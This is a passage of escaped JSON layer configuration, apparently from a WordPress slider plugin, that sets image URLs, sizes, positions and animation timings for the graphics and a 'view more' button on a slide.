1\",\"alias\":\"Mermer\",\"uid\":1,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/h3-slide3-graphic1.jpg\",\"imageId\":3275},\"size\":{\"width\":{\"d\":{\"v\":\"1920px\",\"e\":true},\"n\":{\"v\":\"1556px\",\"e\":true},\"t\":{\"v\":\"1556px\"},\"m\":{\"v\":\"1556px\"}},\"height\":{\"d\":{\"v\":\"393px\",\"e\":true},\"n\":{\"v\":\"318px\",\"e\":true},\"t\":{\"v\":\"318px\"},\"m\":{\"v\":\"318px\"}},\"originalWidth\":1920,\"originalHeight\":393,\"aspectRatio\":{\"d\":{\"v\":4.88549618320610701260875430307351052761077880859375},\"n\":{\"v\":4.88549618320610701260875430307351052761077880859375},\"t\":{\"v\":4.88549618320610701260875430307351052761077880859375},\"m\":{\"v\":4.88549618320610701260875430307351052761077880859375}}},\"position\":{\"x\":{\"d\":{\"e\":true},\"n\":{\"v\":\"-10px\",\"e\":true},\"t\":{\"v\":\"-12px\",\"e\":true},\"m\":{\"v\":\"-12px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"-107px\",\"e\":true},\"n\":{\"v\":\"-207px\",\"e\":true},\"t\":{\"v\":\"-64px\",\"e\":true},\"m\":{\"v\":\"-146px\",\"e\":true}},\"horizontal\":{\"d\":{\"e\":true},\"n\":{\"e\":true}},\"vertical\":{\"d\":{\"v\":\"bottom\",\"e\":true},\"n\":{\"v\":\"bottom\",\"e\":true},\"t\":{\"v\":\"bottom\"},\"m\":{\"v\":\"bottom\"}},\"zIndex\":5,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":5,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":10},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":3000,\"startRelative\":2690,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\"},\"5\":{\"text\":\"Image 5\",\"alias\":\"Bell\",\"uid\":5,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/h3-slide3-graphic2-1.png\",\"imageId\":3280},\"size\":{\"width\":{\"d\":{\"v\":\"277px\",\"e\":true},\"n\":{\"v\":\"187px\",\"e\":true},\"t\":{\"v\":\"187px\",\"e\":true},\"m\":{\"v\":\"121px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"450px\",\"e\":true},\"n\":{\"v\":\"304px\",\"e\":true},\"t\":{\"v\":\"304px\",\"e\":true},\"m\":{\"v\":\"197px\",\"e\":true}},\"originalWidth\":277,\"originalHeight\":450,\"aspectRatio\":{\"d\":{\"v\":0.61555555555555552249558104449533857405185699462890625},\"n\":{\"v\":0.61555555555555552249558104449533857405185699462890625},\"t\":{\"v\":0.61555555555555552249558104449533857405185699462890625},\"m\":{\"v\":0.61555555555555552249558104449533857405185699462890625}}},\"position\":{\"x\":{\"d\":{\"v\":\"185px\",\"e\":true},\"n\":{\"v\":\"140px\",\"e\":true},\"t\":{\"v\":\"-127px\",\"e\":true},\"m\":{\"v\":\"225px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"75px\",\"e\":true},\"n\":{\"v\":\"110px\",\"e\":true},\"t\":{\"v\":\"140px\",\"e\":true},\"m\":{\"v\":\"133px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"right\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"v\":\"bottom\",\"e\":true}},\"zIndex\":6,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":6,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":740},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"right\"},\"n\":{\"v\":\"right\"},\"t\":{\"v\":\"right\"},\"m\":{\"v\":\"right\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"Power2.easeOut\",\"speed\":1170,\"start\":740,\"startRelative\":740},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"Power2.easeOut\",\"speed\":1170,\"start\":740,\"startRelative\":740},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":0,\"start\":3000,\"startRelative\":1090,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\"},\"3\":{\"text\":\"Image 3\",\"alias\":\"Box\",\"uid\":3,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/h3-slide3-graphic-4.png\",\"imageId\":4249},\"size\":{\"width\":{\"d\":{\"v\":\"798px\",\"e\":true},\"n\":{\"v\":\"632px\",\"e\":true},\"t\":{\"v\":\"632px\",\"e\":true},\"m\":{\"v\":\"448px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"506px\",\"e\":true},\"n\":{\"v\":\"401px\",\"e\":true},\"t\":{\"v\":\"401px\",\"e\":true},\"m\":{\"v\":\"284px\",\"e\":true}},\"originalWidth\":798,\"originalHeight\":506,\"aspectRatio\":{\"d\":{\"v\":1.5770750988142292481342110477271489799022674560546875},\"n\":{\"v\":1.5770750988142292481342110477271489799022674560546875},\"t\":{\"v\":1.5770750988142292481342110477271489799022674560546875},\"m\":{\"v\":1.5770750988142292481342110477271489799022674560546875}}},\"position\":{\"x\":{\"d\":{\"v\":\"633px\",\"e\":true},\"n\":{\"v\":\"460px\",\"e\":true},\"t\":{\"v\":\"232px\",\"e\":true},\"m\":{\"v\":\"-177px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"102px\",\"e\":true},\"n\":{\"v\":\"110px\",\"e\":true},\"t\":{\"v\":\"145px\",\"e\":true},\"m\":{\"v\":\"89px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"right\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"v\":\"bottom\",\"e\":true}},\"zIndex\":7,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":7,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":940},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"right\"},\"n\":{\"v\":\"right\"},\"t\":{\"v\":\"right\"},\"m\":{\"v\":\"right\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"Power2.easeOut\",\"speed\":1170,\"start\":940,\"startRelative\":940},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"Power2.easeOut\",\"speed\":1170,\"start\":940,\"startRelative\":940},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":0,\"start\":3000,\"startRelative\":890,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\"},\"2\":{\"text\":\"Image 2\",\"alias\":\"Biljka\",\"uid\":2,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/h3-slide3-graphic-3.png\",\"imageId\":3278},\"size\":{\"width\":{\"d\":{\"v\":\"663px\",\"e\":true},\"n\":{\"v\":\"428px\",\"e\":true},\"t\":{\"v\":\"428px\"},\"m\":{\"v\":\"272px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"748px\",\"e\":true},\"n\":{\"v\":\"482px\",\"e\":true},\"t\":{\"v\":\"482px\"},\"m\":{\"v\":\"306px\",\"e\":true}},\"originalWidth\":663,\"originalHeight\":748,\"aspectRatio\":{\"d\":{\"v\":0.88636363636363635354342704886221326887607574462890625},\"n\":{\"v\":0.88636363636363635354342704886221326887607574462890625},\"t\":{\"v\":0.88636363636363635354342704886221326887607574462890625},\"m\":{\"v\":0.88636363636363635354342704886221326887607574462890625}}},\"position\":{\"x\":{\"d\":{\"v\":\"692px\",\"e\":true},\"n\":{\"v\":\"500px\",\"e\":true},\"t\":{\"v\":\"257px\",\"e\":true},\"m\":{\"v\":\"-120px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"-36px\",\"e\":true},\"n\":{\"v\":\"50px\",\"e\":true},\"t\":{\"v\":\"94px\",\"e\":true},\"m\":{\"v\":\"107px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"right\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\"},\"m\":{\"v\":\"bottom\",\"e\":true}},\"zIndex\":8,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":8,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":1040},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"right\"},\"n\":{\"v\":\"right\"},\"t\":{\"v\":\"right\"},\"m\":{\"v\":\"right\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"Power2.easeOut\",\"speed\":1170,\"start\":1040,\"startRelative\":1040},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"Power2.easeOut\",\"speed\":1170,\"start\":1040,\"startRelative\":1040},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":0,\"start\":3000,\"startRelative\":790,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\"},\"11\":{\"text\":\"[qodef_button text=\\\"view more\\\" target=\\\"_self\\\" icon_pack=\\\"\\\" font_weight=\\\"\\\" text_transform=\\\"\\\"]\",\"alias\":\"Button\",\"uid\":11,\"size\":{\"width\":{\"d\":{\"v\":\"506px\",\"e\":true},\"n\":{\"v\":\"506px\",\"e\":true},\"t\":{\"v\":\"506px\",\"e\":true},\"m\":{\"v\":\"506px\",\"e\":true}},\"height\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"originalWidth\":\"506px\"},\"position\":{\"x\":{\"d\":{\"v\":\"-367px\",\"e\":true},\"n\":{\"v\":\"-243px\",\"e\":true},\"t\":{\"v\":\"-42px\",\"e\":true},\"m\":{\"v\":\"166px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"114px\",\"e\":true},\"n\":{\"v\":\"152px\",\"e\":true},\"t\":{\"v\":\"281px\",\"e\":true},\"m\":{\"v\":\"147px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"zIndex\":9,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":9,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":700},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\"